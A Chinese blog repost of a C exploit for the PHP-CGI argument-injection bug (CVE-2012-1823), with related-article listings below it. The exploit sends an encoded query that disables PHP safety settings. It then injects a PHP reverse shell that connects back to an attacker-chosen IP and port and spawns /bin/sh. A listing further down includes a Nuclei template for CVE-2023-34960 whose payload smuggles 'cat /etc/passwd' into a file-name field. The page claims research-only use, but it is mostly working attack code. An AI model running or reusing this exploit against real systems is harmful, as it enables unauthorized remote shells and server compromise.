Apache / PHP 5.x Remote Code Execution Exploit

最新推荐文章于 2025-05-05 01:25:58 发布
转载 最新推荐文章于 2025-05-05 01:25:58 发布 · 278 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/security4399/p/3400375.html
文章标签:

#php #shell #操作系统

本文详细介绍了Apache与PHP组合中的代码执行漏洞,重点分析了Debian和Ubuntu上默认安装的php5-cgi包存在的安全缺陷。通过设置特定的php.ini配置项,攻击者可以在不受安全检查的情况下执行任意PHP脚本,实现对系统的恶意操作。
测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  1. /* Apache Magica by Kingcope */
  2. /* gcc apache-magika.c -o apache-magika -lssl */
  3. /* This is a code execution bug in the combination of Apache and PHP.
  4. On Debian and Ubuntu the vulnerability is present in the default install
  5. of the php5-cgi package. When the php5-cgi package is installed on Debian and
  6. Ubuntu or php-cgi is installed manually the php-cgi binary is accessible under
  7. /cgi-bin/php5 and /cgi-bin/php. The vulnerability makes it possible to execute
  8. the binary because this binary has a security check enabled when installed with
  9. Apache http server and this security check is circumvented by the exploit.
  10. When accessing the php-cgi binary the security check will block the request and
  11. will not execute the binary.
  12. In the source code file sapi/cgi/cgi_main.c of PHP we can see that the security
  13. check is done when the php.ini configuration setting cgi.force_redirect is set
  14. and the php.ini configuration setting cgi.redirect_status_env is set to no.
  15. This makes it possible to execute the binary bypassing the Security check by
  16. setting these two php.ini settings.
  17. Prior to this code for the Security check getopt is called and it is possible
  18. to set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the
  19. -d switch. If both values are set to zero and the request is sent to the server
  20. php-cgi gets fully executed and we can use the payload in the POST data field
  21. to execute arbitrary php and therefore we can execute programs on the system.
  22. apache-magika.c is an exploit that does exactly the prior described. It does
  23. support SSL.
  24. /* Affected and tested versions
  25. PHP 5.3.10
  26. PHP 5.3.8-1
  27. PHP 5.3.6-13
  28. PHP 5.3.3
  29. PHP 5.2.17
  30. PHP 5.2.11
  31. PHP 5.2.6-3
  32. PHP 5.2.6+lenny16 with Suhosin-Patch
  33. Affected versions
  34. PHP prior to 5.3.12
  35. PHP prior to 5.4.2
  36. Unaffected versions
  37. PHP 4 - getopt parser unexploitable
  38. PHP 5.3.12 and up
  39. PHP 5.4.2 and up
  40. Unaffected versions are patched by CVE-2012-1823.
  41. */
  42. /* .
  43. /'\rrq rk
  44. . // \\ .
  45. .x.//fco\\-|-
  46. '//cmtco\\zt
  47. //6meqrg.\\tq
  48. //_________\\'
  49. EJPGQO
  50. apache-magica.c by Kingcope
  51. */
  52.  
  53. #include<stdio.h>
  54. #include<stdlib.h>
  55. #include<unistd.h>
  56. #include<getopt.h>
  57. #include<sys/types.h>
  58. #include<stddef.h>
  59. #include<openssl/rand.h>
  60. #include<openssl/ssl.h>
  61. #include<openssl/err.h>
  62. #include<netdb.h>
  63. #include<sys/socket.h>
  64. #include<netinet/in.h>
  65.  
  66. typedefstruct{
  67. int sockfd;
  68. SSL *handle;
  69. SSL_CTX *ctx;
  70. } connection;
  71.  
  72. void usage(char*argv[])
  73. {
  74. printf("usage: %s <--target target> <--port port> <--protocol http|https> " \
  75. "<--reverse-ip ip> <--reverse-port port> [--force-interpreter interpreter]\n",
  76. argv[0]);
  77. exit(1);
  78. }
  79.  
  80. char poststr[]="POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F" \
  81. "%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64" \
  82. "+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73" \
  83. "%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E" \
  84. "%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63" \
  85. "%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62" \
  86. "%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74" \
  87. "%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68" \
  88. "%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F" \
  89. "%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63" \
  90. "%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73" \
  91. "%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\r\n" \
  92. "Host: %s\r\n" \
  93. "User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26" \
  94. "(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\r\n" \
  95. "Content-Type: application/x-www-form-urlencoded\r\n" \
  96. "Content-Length: %d\r\n" \
  97. "Connection: close\r\n\r\n%s";
  98. char phpstr[]="<?php\n" \
  99. "set_time_limit(0);\n" \
  100. "$ip = '%s';\n" \
  101. "$port = %d;\n" \
  102. "$chunk_size = 1400;\n" \
  103. "$write_a = null;\n" \
  104. "$error_a = null;\n" \
  105. "$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';\n" \
  106. "$daemon = 0;\n" \
  107. "$debug = 0;\n" \
  108. "if (function_exists('pcntl_fork')) {\n" \
  109. " $pid = pcntl_fork(); \n" \
  110. " if ($pid == -1) {\n" \
  111. " printit(\"ERROR: Can't fork\");\n" \
  112. " exit(1);\n" \
  113. " }\n" \
  114. " if ($pid) {\n" \
  115. " exit(0);\n" \
  116. " }\n" \
  117. " if (posix_setsid() == -1) {\n" \
  118. " printit(\"Error: Can't setsid()\");\n" \
  119. " exit(1);\n" \
  120. " }\n" \
  121. " $daemon = 1;\n" \
  122. "} else {\n" \
  123. " printit(\"WARNING: Failed to daemonise.\");\n" \
  124. "}\n" \
  125. "chdir(\"/\");\n" \
  126. "umask(0);\n" \
  127. "$sock = fsockopen($ip, $port, $errno, $errstr, 30);\n" \
  128. "if (!$sock) {\n" \
  129. " printit(\"$errstr ($errno)\");\n" \
  130. " exit(1);\n" \
  131. "}\n" \
  132. "$descriptorspec = array(\n" \
  133. " 0 => array(\"pipe\", \"r\"),\n" \
  134. " 1 => array(\"pipe\", \"w\"),\n" \
  135. " 2 => array(\"pipe\", \"w\")\n" \
  136. ");\n" \
  137. "$process = proc_open($shell, $descriptorspec, $pipes);\n" \
  138. "if (!is_resource($process)) {\n" \
  139. " printit(\"ERROR: Can't spawn shell\");\n" \
  140. " exit(1);\n" \
  141. "}\n" \
  142. "stream_set_blocking($pipes[0], 0);\n" \
  143. "stream_set_blocking($pipes[1], 0);\n" \
  144. "stream_set_blocking($pipes[2], 0);\n" \
  145. "stream_set_blocking($sock, 0);\n" \
  146. "while (1) {\n" \
  147. " if (feof($sock)) {\n" \
  148. " printit(\"ERROR: Shell connection terminated\");\n" \
  149. " break;\n" \
  150. " }\n" \
  151. " if (feof($pipes[1])) {\n" \
  152. " printit(\"ERROR: Shell process terminated\");\n" \
  153. " break;\n" \
  154. " }\n" \
  155. " $read_a = array($sock, $pipes[1], $pipes[2]);\n" \
  156. " $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n" \
  157. " if (in_array($sock, $read_a)) {\n" \
  158. " if ($debug) printit(\"SOCK READ\");\n" \
  159. " $input = fread($sock, $chunk_size);\n" \
  160. " if ($debug) printit(\"SOCK: $input\");\n" \
  161. " fwrite($pipes[0], $input);\n" \
  162. " }\n" \
  163. " if (in_array($pipes[1], $read_a)) {\n" \
  164. " if ($debug) printit(\"STDOUT READ\");\n" \
  165. " $input = fread($pipes[1], $chunk_size);\n" \
  166. " if ($debug) printit(\"STDOUT: $input\");\n" \
  167. " fwrite($sock, $input);\n" \
  168. " }\n" \
  169. " if (in_array($pipes[2], $read_a)) {\n" \
  170. " if ($debug) printit(\"STDERR READ\");\n" \
  171. " $input = fread($pipes[2], $chunk_size);\n" \
  172. " if ($debug) printit(\"STDERR: $input\");\n" \
  173. " fwrite($sock, $input);\n" \
  174. " }\n" \
  175. "}\n" \
  176. "\n" \
  177. "fclose($sock);\n" \
  178. "fclose($pipes[0]);\n" \
  179. "fclose($pipes[1]);\n" \
  180. "fclose($pipes[2]);\n" \
  181. "proc_close($process);\n" \
  182. "function printit ($string) {\n" \
  183. " if (!$daemon) {\n" \
  184. " print \"$string\n\";\n" \
  185. " }\n" \
  186. "}\n" \
  187. "exit(1);\n" \
  188. "?>";
  189.  
  190. struct sockaddr_in *gethostbyname_(char*hostname,unsignedshort port)
  191. {
  192. struct hostent *he;
  193. struct sockaddr_in server,*servercopy;
  195. if((he=gethostbyname(hostname))== NULL){
  196. printf("Hostname cannot be resolved\n");
  197. exit(255);
  198. }
  200. servercopy = malloc(sizeof(struct sockaddr_in));
  201. if(!servercopy){
  202. printf("malloc error (1)\n");
  203. exit(255);
  204. }
  205. memset(&server,'\0',sizeof(struct sockaddr_in));
  206. memcpy(&server.sin_addr, he->h_addr_list[0], he->h_length);
  207. server.sin_family = AF_INET;
  208. server.sin_port = htons(port);
  209. memcpy(servercopy,&server,sizeof(struct sockaddr_in));
  210. return servercopy;
  211. }
  212.  
  213. char*sslread(connection *c)
  214. {
  215. char*rc = NULL;
  216. int received, count =0, count2=0;
  217. char ch;
  218.  
  219. for(;;)
  220. {
  221. if(!rc)
  222. rc = calloc(1024,sizeof(char)+1);
  223. else
  224. if(count2 %1024==0){
  225. rc = realloc(rc,(count2 +1)*1024*sizeof(char)+1);
  226. }
  227. received = SSL_read(c->handle,&ch,1);
  228. if(received ==1){
  229. rc[count++]= ch;
  230. count2++;
  231. if(count2 >1024*5)
  232. break;
  233. }
  234. else
  235. break;
  236. }
  237. return rc;
  238. }
  239.  
  240. char*read_(int sockfd)
  241. {
  242. char*rc = NULL;
  243. int received, count =0, count2=0;
  244. char ch;
  245.  
  246. for(;;)
  247. {
  248. if(!rc)
  249. rc = calloc(1024,sizeof(char)+1);
  250. else
  251. if(count2 %1024==0){
  252. rc = realloc(rc,(count2 +1)*1024*sizeof(char)+1);
  253. }
  254. received = read(sockfd,&ch,1);
  255. if(received ==1){
  256. rc[count++]= ch;
  257. count2++;
  258. if(count2 >1024*5)
  259. break;
  260. }
  261. else
  262. break;
  263. }
  264. return rc;
  265. }
  266.  
  267. void main(int argc,char*argv[])
  268. {
  269. char*target,*protocol,*targetip,*writestr,*tmpstr,*readbuf=NULL,
  270. *interpreter,*reverseip,*reverseportstr,*forceinterpreter=NULL;
  271. char httpsflag=0;
  272. unsignedshort port=0, reverseport=0;
  273. struct sockaddr_in *server;
  274. int sockfd;
  275. unsignedint writesize, tmpsize;
  276. unsignedint i;
  277. connection *sslconnection;
  278. printf("-== Apache Magika by Kingcope ==-\n");
  279. for(;;)
  280. {
  281. int c;
  282. int option_index=0;
  283. staticstruct option long_options[]={
  284. {"target", required_argument,0,0},
  285. {"port", required_argument,0,0},
  286. {"protocol", required_argument,0,0},
  287. {"reverse-ip", required_argument,0,0},
  288. {"reverse-port", required_argument,0,0},
  289. {"force-interpreter", required_argument,0,0},
  290. {0,0,0,0}
  291. };
  293. c = getopt_long(argc, argv,"", long_options,&option_index);
  294. if(c <0)
  295. break;
  297. switch(c){
  298. case0:
  299. switch(option_index){
  300. case0:
  301. if(optarg){
  302. target = calloc(strlen(optarg)+1,sizeof(char));
  303. if(!target){
  304. printf("calloc error (2)\n");
  305. exit(255);
  306. }
  307. memcpy(target, optarg, strlen(optarg)+1);
  308. }
  309. break;
  310. case1:
  311. if(optarg)
  312. port = atoi(optarg);
  313. break;
  314. case2:
  315. protocol = calloc(strlen(optarg)+1,sizeof(char));
  316. if(!protocol){
  317. printf("calloc error (3)\n");
  318. exit(255);
  319. }
  320. memcpy(protocol, optarg, strlen(optarg)+1);
  321. if(!strcmp(protocol,"https"))
  322. httpsflag=1;
  323. break;
  324. case3:
  325. reverseip = calloc(strlen(optarg)+1,sizeof(char));
  326. if(!reverseip){
  327. printf("calloc error (4)\n");
  328. exit(255);
  329. }
  330. memcpy(reverseip, optarg, strlen(optarg)+1);
  331. break;
  332. case4:
  333. reverseport = atoi(optarg);
  334. reverseportstr = calloc(strlen(optarg)+1,sizeof(char));
  335. if(!reverseportstr){
  336. printf("calloc error (5)\n");
  337. exit(255);
  338. }
  339. memcpy(reverseportstr, optarg, strlen(optarg)+1);
  340. break;
  341. case5:
  342. forceinterpreter = calloc(strlen(optarg)+1,sizeof(char));
  343. if(!forceinterpreter){
  344. printf("calloc error (6)\n");
  345. exit(255);
  346. }
  347. memcpy(forceinterpreter, optarg, strlen(optarg)+1);
  348. break;
  349. default:
  350. usage(argv);
  351. }
  352. break;
  354. default:
  355. usage(argv);
  356. }
  357. }
  358.  
  359. if((optind < argc)||!target ||!protocol ||!port ||
  360. !reverseip ||!reverseport){
  361. usage(argv);
  362. }
  364. server = gethostbyname_(target, port);
  365. if(!server){
  366. printf("Error while resolving hostname. (7)\n");
  367. exit(255);
  368. }
  369.  
  370. char*interpreters[5];
  371. int ninterpreters =5;
  372. interpreters[0]= strdup("/cgi-bin/php");
  373. interpreters[1]= strdup("/cgi-bin/php5");
  374. interpreters[2]= strdup("/cgi-bin/php-cgi");
  375. interpreters[3]= strdup("/cgi-bin/php.cgi");
  376. interpreters[4]= strdup("/cgi-bin/php4");
  378. for(i=0;i<ninterpreters;i++){
  379. interpreter = interpreters[i];
  380. if(forceinterpreter){
  381. interpreter = strdup(forceinterpreter);
  382. }
  383. if(forceinterpreter && i)
  384. break;
  385. printf("%s\n", interpreter);
  387. sockfd = socket(AF_INET, SOCK_STREAM,0);
  388. if(sockfd <1){
  389. printf("socket error (8)\n");
  390. exit(255);
  391. }
  393. if(connect(sockfd,(void*)server,sizeof(struct sockaddr_in))<0){
  394. printf("connect error (9)\n");
  395. exit(255);
  396. }
  397. if(httpsflag){
  398. sslconnection =(connection*) malloc(sizeof(connection));
  399. if(!sslconnection){
  400. printf("malloc error (10)\n");
  401. exit(255);
  402. }
  403. sslconnection->handle = NULL;
  404. sslconnection->ctx = NULL;
  405.  
  406. SSL_library_init();
  407.  
  408. sslconnection->ctx = SSL_CTX_new(SSLv23_client_method());
  409. if(!sslconnection->ctx){
  410. printf("SSL_CTX_new error (11)\n");
  411. exit(255);
  412. }
  413.  
  414. sslconnection->handle = SSL_new(sslconnection->ctx);
  415. if(!sslconnection->handle){
  416. printf("SSL_new error (12)\n");
  417. exit(255);
  418. }
  419. if(!SSL_set_fd(sslconnection->handle, sockfd)){
  420. printf("SSL_set_fd error (13)\n");
  421. exit(255);
  422. }
  424. if(SSL_connect(sslconnection->handle)!=1){
  425. printf("SSL_connect error (14)\n");
  426. exit(255);
  427. }
  428. }
  430. tmpsize = strlen(phpstr)+ strlen(reverseip)+ strlen(reverseportstr)+64;
  431. tmpstr =(char*)calloc(tmpsize,sizeof(char));
  432. snprintf(tmpstr, tmpsize, phpstr, reverseip, reverseport);
  434. writesize = strlen(target)+ strlen(interpreter)+
  435. strlen(poststr)+ strlen(tmpstr)+64;
  436. writestr =(char*)calloc(writesize,sizeof(char));
  437. snprintf(writestr, writesize, poststr, interpreter,
  438. target, strlen(tmpstr), tmpstr);
  440. if(!httpsflag){
  441. write(sockfd, writestr, strlen(writestr));
  442. readbuf = read_(sockfd);
  443. }else{
  444. SSL_write(sslconnection->handle, writestr, strlen(writestr));
  445. readbuf = sslread(sslconnection);
  446. }
  448. if(readbuf){
  449. printf("***SERVER RESPONSE***\n\n%s\n\n", readbuf);
  450. }else{
  451. printf("read error (15)\n");
  452. exit(255);
  453. }
  454. }
  455. exit(1);
  456. }

转载于:https://www.cnblogs.com/security4399/p/3400375.html

Apache Solr Remote Code Execution Via Velocity Custom Template (CVE-2019-17558)漏洞复现
千寻的博客
02-24 475
文章目录漏洞名称漏洞编号漏洞描述影响版本实验环境及准备第一步 使用dockers搭建环境第二步 访问网站第三步 漏洞点查看第四步通过如下请求开启params.resource.loader.enabled,其中API路径包含刚才获取的core名称:漏洞复现方法一:burp抓包方法二:Metasploit使用方法三:vulmap工具方法四: 工具利用修复建议笔记下载摘抄 漏洞名称 Apache Solr Remote Code Execution Via Velocity Custom Template
PHP-CGI远程代码执行漏洞
weixin_69925635的博客
07-18 837
使用kali-msf6对ubuntu的php-CGI漏洞攻击
Microsoft WINS Remote Code Execution Exploit (MS04-045)
DcBoy's Blog
01-01 1309
Date : 31/12/2004CAN-2004-1080/*************************************************************//* ZUCWins 0.1 - Wins 2000 remote root exploit */
PHP-CGI远程代码执行
qq_53701412的博客
04-17 798
PHP SAPL
XAMPP PHP-CGI 远程代码执行漏洞(CVE-2024-4577)
【Rainbow Network Technology co., LTD】
06-15 1409
2024 年 6 月 7 日,推特安全上 orange 公开了其漏洞 CVE-2024-4577 细节,并且 PHP 官方已修复该漏洞。该漏洞仅适用于 php 版本为 8.1 < 8.1.29,PHP 8.2 < 8.2.20,PHP 8.3 < 8.3.8,同时在 php-cgi 模式下运行 php,并且运行在 windows 平台,且使用语系为繁体中文 950、日文 932、简体中文 936 等。
php 利用一句话木马客户端.html_php-fpm Remote Code Execution 分析(CVE-2019-11043)
weixin_39869043的博客
11-23 502
漏洞简介国外安全研究员 Andrew Danau发现向服务器请求的URL中包含%0a 符号时,服务返回异常,疑似存在漏洞。Nginx+php-fpm的环境中,若Nginx上的fastcgi_split_path_info指令配置不当,在处理带包含%0a的URL时会导致正则匹配失效从而PATH_INFO的结果为空。当Nginx将包含PATH_INFO为空的fastcgi传递给后端php-fpm时,p...
php cgi 执行,PHP-CGI远程任意代码执行漏洞
weixin_42525672的博客
03-10 659
PHP-CGI远程任意代码执行漏洞发布日期:2012-05-03更新日期:2012-05-04受影响系统:PHP PHP描述:--------------------------------------------------------------------------------CVE ID: CVE-2012-1823PHP是一种HTML内嵌式的语言,PHP与微软的ASP颇有几分相似,都是...
id: CVE-2023-34960 info: name: Chamilo Command Injection author: DhiyaneshDK severity: critical description: | A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name. impact: | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the command injection vulnerability in Chamilo LMS. reference: - https://sploitus.com/exploit?id=FD666992-20E1-5D83-BA13-67ED38E1B83D - https://github.com/Aituglo/CVE-2023-34960/blob/master/poc.py - http://chamilo.com - http://packetstormsecurity.com/files/174314/Chamilo-1.11.18-Command-Injection.html - https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-112-2023-04-20-Critical-impact-High-risk-Remote-Code-Execution classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-34960 cwe-id: CWE-77 epss-score: 0.93314 epss-percentile: 0.99067 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: chamilo product: chamilo shodan-query: - http.component:"Chamilo" - http.component:"chamilo" - cpe:"cpe:2.3:a:chamilo:chamilo" tags: cve,cve2023,packetstorm,chamilo http: - raw: - | POST /main/webservices/additional_webservices.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml; charset=utf-8 <?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{RootURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{}`.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope> matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - type: word part: header words: - text/xml - type: status status: - 200 # digest: 4a0a00473045022034e60ad33e2160ec78cbef2c6c410b14dabd6c3ca8518c21571e310453a24e25022100927e4973b55f38f2cc8ceca640925b7066d4325032b04fb0eca080984080a1d0:922c64590222798bb761d5b6d8e72950根据poc实现python的exp,并且读取当前目录下的文件 批量执行 ,例如,python CVE-2023-34960.py -f .8.txt -c "需要执行的命令" 并将执行成功的结果输出 -o 9.txt 添加选项-o 8.txt的文本文件
03-27
因此,在脚本中,可能需要将用户输入的目标作为Host头,并发送请求到http://目标/main/webservices/additional_webservices.php,或者可能需要更灵活的处理方式,例如允许用户输入完整的URL,或者处理不同的路径情况...
php cgi源码,PHP-CGI远程任意代码执行漏洞
weixin_36482113的博客
03-09 623
### $Id$##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and...
Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现
weixin_30788619的博客
08-29 169
一、 Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现 漏洞描述: Home Web Server允许调用CGI程序来通过POST请求访问位于/cgi-bin下的文件,然后通过目录遍历,就有可能执行远程主机的任意可执行程序。 漏洞影响范围: Home Web Server 1.9.1 build 164 漏洞复现...
How to Exploit libphp7.0.so in Apache2
weixin_33973600的博客
03-08 372
小叮当 · 2016/05/19 14:280x00 简介之前有外国牛人发部blog Double Free in Standard PHP Library Double Link List [CVE-2016-3132]其文章详述了漏洞成因#!php &lt;?php $var_1=new SplStack(); $var_1-&gt;offsetSet(100,new DateTime('20...
PHP-CGI远程代码执行漏洞 CVE-2012-1823 漏洞复现
ADummy的博客
02-25 1084
PHP-CGI远程代码执行漏洞(CVE-2012-1823) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>代码执行 0x01漏洞介绍 ​ 首先,介绍一下PHP的运行模式。 下载PHP源码,可以看到其中有个目录叫sapi。sapi在PHP中的作用,类似于一个消息的“传递者”,比如我在《Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写》一文中介绍的fpm,他的作用就是接受Web容器通过fastcgi协议封装好的
PHP-CGI远程代码执行漏洞CVE-2012-1823漏洞复现
qq_29365787的博客
12-10 1489
一、漏洞介绍 这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是只http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。 影响范围: 漏洞影响版本 php < 5.3.12 or php < 5.4.2 PS:CVE-2012-1823是在php-cgi运行模式下出现的漏洞,其漏洞只出现在以cgi模式运行的php中 二、PHP运行的四种模式: 1)cgi 通用网关接口(
阿里云服务器提示PHP-CGI远程代码执行(CVE-2012-1823)
Selly166的博客
07-17 456
记一次阿里云服务器漏洞提示 服务器环境: web服务器:apache php:版本 >= 7 阿里给的技术参考 操作记录 修改php.ini,打开fix_pathinfo=1的注释,修改为0 重启apache 结果【验证】未通过,截止目前20200717,准备给阿里提交工单; 其他安装性配置修改 隐藏apache版本 在httpd.conf中加入,增加之前建议先搜索 ServerTokens ProductOnly ServerSignature Off 隐藏PHP版本信息 修改p.
PHP CGI远程代码执行高危漏洞(CVE-2024-4577)复现与源码分析
最新发布
weixin_42100387的博客
05-05 928
PHP CGI远程代码执行高危漏洞(CVE-2024-4577)复现与源码分析
PHP-CGI远程任意代码执行漏洞(CVE-2012-1823)修复方案
weixin_34342905的博客
04-20 670
  首先介绍一下这个漏洞,其实是在apache调用php解释器解释.php文件时,会将url参数传我给php解释器,如果在url后加传命令行开关(例如-s、-d 、-c或 -dauto_prepend_file%3d/etc/passwd+-n)等参数时,会导致源代码泄露和任意代码执行。   这个漏洞影响php-5.3.12以前的版本,mod方式、fpm方式不受影响。   既然...
apache php解析漏洞,apache解析漏洞及修复方法
weixin_34476159的博客
03-19 172
apache对文件后缀的解析方法是”.”后边的都是后缀,从后到前,如果后缀无效,会解析前一个,例如 1.php.x1.x2.x3 他会先解析x3,不存在解析x2,不存在解析x1,都不存在就只能解析php了。如图:定义后缀,但是不可能所有后缀都定义吧?x1.x2.x3可以换成任意后缀例如1.php.a,.a没有定义,apache不明白a是什么后缀,就向前解析,也就是去解析php。用伪静态能解决这个问...
php cgi远程任意代码执行漏洞
收集盒 Book box
11-16 5862
CVE-2012-1823(PHP-CGI RCE)的PoC及技术挑战 GaRY  | 2012-05-04 02:16 国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞: http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/  粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值